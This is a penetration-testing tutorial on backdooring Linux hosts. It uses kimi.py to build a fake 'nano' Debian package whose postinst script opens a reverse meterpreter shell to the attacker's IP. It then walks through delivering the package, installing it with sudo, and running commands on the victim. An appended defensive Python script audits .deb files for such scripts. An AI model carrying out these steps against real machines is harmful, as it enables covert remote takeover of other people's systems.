Hacking Linux Operating System for Remote Access: Malicious Debian Package

Welcome back. Today we will be talking about remote access to machines running Linux operating systems.

Why would someone want to target a system running Linux?

Over 60% of all web servers around the world run variations of Linux, as do a lot of personal computers and smartphones. Linux is everywhere, from traffic lights to thermostats, and it is now finding its way onto televisions and even cars. As software creeps into practically every aspect of our lives, so does the OS designed by Linus Torvalds.

An attacker would target a web server or personal system to gain remote access and a shell. This would allow the attacker to edit, modify, delete and execute processes on the target system, as well as carry out further attacks.

 

Requirements:
Kali Linux (Attacker)
Computer running Linux Operating System
kimi.py
Metasploit Framework

 

What is Kimi?

Kimi is a script that generates a malicious Debian package for Metasploit which consists of a bash file. The bash file is deployed into the “/usr/local/bin/” directory.

The backdoor is executed as soon as the victim tries to install the .deb package, because of the package's postinst file.

The bash file injects and also acts like some system commands. When it is executed by the victim, the attacker will be granted access to a remote session.

 

Download Kimi

https://github.com/ChaitanyaHaritash/kimi

Let's start: open a new terminal and run the kimi.py Python script.

python kimi.py

Now that we know our script is working, it's time to set the reverse IP address and choose a version for our malicious Debian package.

To find your local IP address, use the ifconfig command from your terminal.

ifconfig

Now that we know our local IP address, we can use it to configure our malicious payload.

In a terminal, run kimi.py with these options, replacing the IP address with your own local IP address.

sudo python kimi.py -n nano -l 192.168.43.49 -V 1.0

This command runs kimi and tells the script to build a malicious .DEB package of nano version 1.0.

After the script has finished creating the malicious .DEB file, it will spawn Metasploit Framework in XTerm.

Now move the malicious payload across to the victim machine. I will be using a USB thumb drive, and the operating system I’ll be targeting is Linux Kubuntu 64-bit. However, you can use whatever Linux operating system you like, as long as it supports Debian packages. Use whatever method suits your situation best for delivery of the payload.

Use dpkg -i to install the malicious package on the victim machine. Alternatively, you can double-click the package to install it if you like.

I’ll install my .DEB package with sudo rights.

sudo dpkg -i <deb-package>

Tip: (remember in Linux sudo can be your best friend or your worst enemy.) By the end of this guide, you should understand why.

You can see from the screenshot below that we have now established a reverse meterpreter connection with the target machine.

We can now list and connect to an established meterpreter session.

To list sessions: sessions -l
To connect to a session: sessions -i 1

Now that we have established a meterpreter shell, we use the help command to list the available options on the target machine.

We will now execute a command and start a program on our target machine. To achieve this we can use the execute command with the -f option.

Example: meterpreter > execute -f gimp

This command starts a gimp process and runs the software on the target machine.

Let’s say that, for whatever reason, we needed a detailed list of connections on the target network. We could use ifconfig to list various information about the target network, including MAC addresses and interface names, and to set various network modes.

We will now get the uid of the established session. This will help us tell if we are running the shell under a root or standard user.

Let's shut down the target system by executing a shutdown command. We can achieve this by using the execute command followed by shutdown.

Any command that the Linux system allows can be executed by meterpreter including starting and restarting running services.

Conclusion

Always make sure Debian and other packages that require manual install are from a valid source.
Don’t install software without thoroughly checking its origin.
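
One way to check a package before running dpkg -i on it, as an added example that is not part of the original article or of kimi: the Python code below reads a .deb without installing it and reports any maintainer scripts (such as the postinst described above) and any files shipped under /usr/local, where Debian policy says packages must not place files. The function names and the harmless sample package are constructed for illustration, and control archives compressed with zstd are not handled.

```python
import io
import tarfile

SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}  # dpkg runs these as root

def ar_members(deb):  # split the outer ar archive of a .deb into {name: bytes}
    if deb[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive, so not a .deb")
    members, pos = {}, 8
    while pos + 60 <= len(deb):
        name = deb[pos:pos + 16].decode().strip().rstrip("/")
        size = int(deb[pos + 48:pos + 58].decode().strip())
        members[name] = deb[pos + 60:pos + 60 + size]
        pos += 60 + size + size % 2  # entries are padded to an even length
    return members

def tar_files(members, prefix):  # {path: bytes} for files in control.tar.* / data.tar.*
    blob = next(data for name, data in members.items() if name.startswith(prefix))
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:  # gz, xz or bz2
        return {m.name.removeprefix("./"): tar.extractfile(m).read() for m in tar if m.isfile()}

def audit_deb(deb):  # report what the package would run or drop, without installing it
    members = ar_members(deb)
    findings = [f"ships file under /usr/local: /{path}"
                for path in tar_files(members, "data.tar") if path.startswith("usr/local/")]
    for name, body in tar_files(members, "control.tar").items():
        if name in SCRIPTS:
            findings.append(f"maintainer script present: {name}")
            findings += [f"{name} references /usr/local: {line.strip()}"
                         for line in body.decode(errors="replace").splitlines() if "/usr/local/" in line]
    return findings

def sample_deb():  # constructed, harmless package laid out as the article describes
    def tar_gz(files):
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w:gz") as tar:
            for path, data in files.items():
                info = tarfile.TarInfo(path)
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
        return buf.getvalue()
    def entry(name, data):  # 60-byte ar header, then data padded to even length
        head = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n"
        return head.encode() + data + b"\n" * (len(data) % 2)
    return (b"!<arch>\n" + entry("debian-binary", b"2.0\n")
            + entry("control.tar.gz", tar_gz({"./postinst": b"#!/bin/sh\n/usr/local/bin/demo &\n"}))
            + entry("data.tar.gz", tar_gz({"./usr/local/bin/demo": b"#!/bin/sh\necho demo\n"})))

if __name__ == "__main__":
    print("\n".join(audit_deb(sample_deb())))
```

To audit a real file, pass its bytes: audit_deb(open(path, "rb").read()). An empty result only means these two checks found nothing, so the package's signature and source still need to be verified.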

Why user Permissions & Restrictions matter

A common error made by a lot of Linux users is running as root all the time. Most operating systems restrict this by prompting the user to set up a secondary user account during the install procedure and prompting for sudo rights when the root account is needed.

Some pentesting distros, such as Kali Linux, come standard with a root user account. Kali was designed to be run from a USB pen drive and was never intended to be run as a full OS install.

Don’t assume that a hacker could not get a remote connection back to your machine because you're running Linux, or any operating system for that matter. On any operating system, be careful when installing packages and using root privileges.